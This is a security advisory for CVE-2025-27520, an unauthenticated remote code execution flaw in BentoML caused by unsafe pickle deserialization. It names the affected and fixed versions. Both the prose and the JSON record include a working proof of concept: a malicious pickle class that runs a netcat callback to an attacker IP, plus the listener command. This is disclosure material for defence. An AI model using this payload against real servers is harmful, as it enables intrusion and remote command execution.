ghsa-33xw-247w-6hmc
Vulnerability from github
Published
2025-04-04 16:05
Modified
2025-04-04 16:05
Severity ?
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Summary
BentoML Allows Remote Code Execution (RCE) via Insecure Deserialization
Details

Summary

A Remote Code Execution (RCE) vulnerability caused by insecure deserialization has been identified in the latest version(v1.4.2) of BentoML. It allows any unauthenticated user to execute arbitrary code on the server.

Details

It exists an unsafe code segment in serde.py: Python def deserialize_value(self, payload: Payload) -> t.Any: if "buffer-lengths" not in payload.metadata: return pickle.loads(b"".join(payload.data)) Through data flow analysis, it is confirmed that the payloadcontent is sourced from an HTTP request, which can be fully manipulated by the attack. Due to the lack of validation in the code, maliciously crafted serialized data can execute harmful actions during deserialization.

PoC

Environment:

  • Server host:
  • IP: 10.98.36.123
  • OS: Ubuntu
  • Attack host:
  • IP: 10.98.36.121

  • OS: Ubuntu

  • Follow the instructions on the BentoML official README(https://github.com/bentoml/BentoML) to set up the environment.

1.1 Install BentoML (Server host: 10.98.36.123) : pip install -U bentoml

1.2 Define APIs in a service.py file (Server host: 10.98.36.123) : ``` Python from future import annotations

import bentoml

@bentoml.service( resources={"cpu": "4"} ) class Summarization: def init(self) -> None: import torch from transformers import pipeline

    device = "cuda" if torch.cuda.is_available() else "cpu"
    self.pipeline = pipeline('summarization', device=device)

@bentoml.api(batchable=True)
def summarize(self, texts: list[str]) -> list[str]:
    results = self.pipeline(texts)
    return [item['summary_text'] for item in results]

```

1.3 Run the service code (Server host: 10.98.36.123) : ``` Bash pip install torch transformers # additional dependencies for local run

bentoml serve ```

  1. Start nc listening on the attacking host (Attack host: 10.98.36.121) : nc -lvvp 1234

  2. Send maliciously crafted request (Attack host: 10.98.36.121) : ``` Python import pickle import os import requests

headers = {'Content-Type': 'application/vnd.bentoml+pickle'}

class Evil: def reduce(self): return(os.system, ('nc 10.98.36.121 1234',))

payload = pickle.dumps(Evil())

requests.post("http://10.98.36.123:3000/summarize", data=payload, headers=headers) ```

  1. Attack success (Attack host: 10.98.36.121) : The server host(10.98.36.123) has connected to the attacker's host(10.98.36.121) listening on port 1234. nc

Impact

Remote Code Execution (RCE).

Show details on source website

To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "bentoml"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.3.4"
            },
            {
              "fixed": "1.4.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-27520"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-04-04T16:05:32Z",
    "nvd_published_at": "2025-04-04T15:15:47Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\nA Remote Code Execution (RCE) vulnerability caused by insecure deserialization has been identified in the latest version(v1.4.2) of BentoML. It allows any unauthenticated user to execute arbitrary code on the server.\n\n### Details\nIt exists an unsafe code segment in `serde.py`: \n```Python\ndef deserialize_value(self, payload: Payload) -\u003e t.Any:\n    if \"buffer-lengths\" not in payload.metadata:\n        return pickle.loads(b\"\".join(payload.data))\n```\nThrough data flow analysis, it is confirmed that the `payload `content is sourced from an HTTP request, which can be fully manipulated by the attack. Due to the lack of validation in the code, maliciously crafted serialized data can execute harmful actions during deserialization.\n\n### PoC\nEnvironment:\n\n- Server host:\n  - IP: 10.98.36.123\n  - OS: Ubuntu \n- Attack host:\n  - IP: 10.98.36.121\n  - OS: Ubuntu \n\n\n\n1. Follow the instructions on the BentoML official README(https://github.com/bentoml/BentoML) to set up the environment.\n\n1.1 Install BentoML (Server host: 10.98.36.123) :\n` pip install -U bentoml`\n\n1.2 Define APIs in a `service.py` file (Server host: 10.98.36.123) :\n``` Python\nfrom __future__ import annotations\n\nimport bentoml\n\n@bentoml.service(\n    resources={\"cpu\": \"4\"}\n)\nclass Summarization:\n    def __init__(self) -\u003e None:\n        import torch\n        from transformers import pipeline\n\n        device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n        self.pipeline = pipeline(\u0027summarization\u0027, device=device)\n\n    @bentoml.api(batchable=True)\n    def summarize(self, texts: list[str]) -\u003e list[str]:\n        results = self.pipeline(texts)\n        return [item[\u0027summary_text\u0027] for item in results]\n```\n\n\n1.3 Run the service code (Server host: 10.98.36.123) :\n``` Bash\npip install torch transformers  # additional dependencies for local run\n\nbentoml serve\n```\n\n\n2. Start nc listening on the attacking host (Attack host: 10.98.36.121) :\n`nc -lvvp 1234`\n\n3. Send maliciously crafted request (Attack host: 10.98.36.121) :\n``` Python\nimport pickle\nimport os\nimport requests\n\nheaders = {\u0027Content-Type\u0027: \u0027application/vnd.bentoml+pickle\u0027}\n\nclass Evil:\n    def __reduce__(self):\n        return(os.system, (\u0027nc 10.98.36.121 1234\u0027,))\n\npayload = pickle.dumps(Evil())\n\nrequests.post(\"http://10.98.36.123:3000/summarize\", data=payload, headers=headers)\n```\n\n\n4. Attack success (Attack host: 10.98.36.121) :\nThe server host(10.98.36.123) has connected to the attacker\u0027s host(10.98.36.121) listening on port 1234.\n![nc](https://github.com/user-attachments/assets/858cba4a-6880-498f-b922-dd9a2dc78a85)\n\n\n\n### Impact\nRemote Code Execution (RCE).",
  "id": "GHSA-33xw-247w-6hmc",
  "modified": "2025-04-04T16:05:32Z",
  "published": "2025-04-04T16:05:32Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/bentoml/BentoML/security/advisories/GHSA-33xw-247w-6hmc"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27520"
    },
    {
      "type": "WEB",
      "url": "https://github.com/bentoml/BentoML/commit/b35f4f4fcc53a8c3fe8ed9c18a013fe0a728e194"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/bentoml/BentoML"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "BentoML Allows Remote Code Execution (RCE) via Insecure Deserialization"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.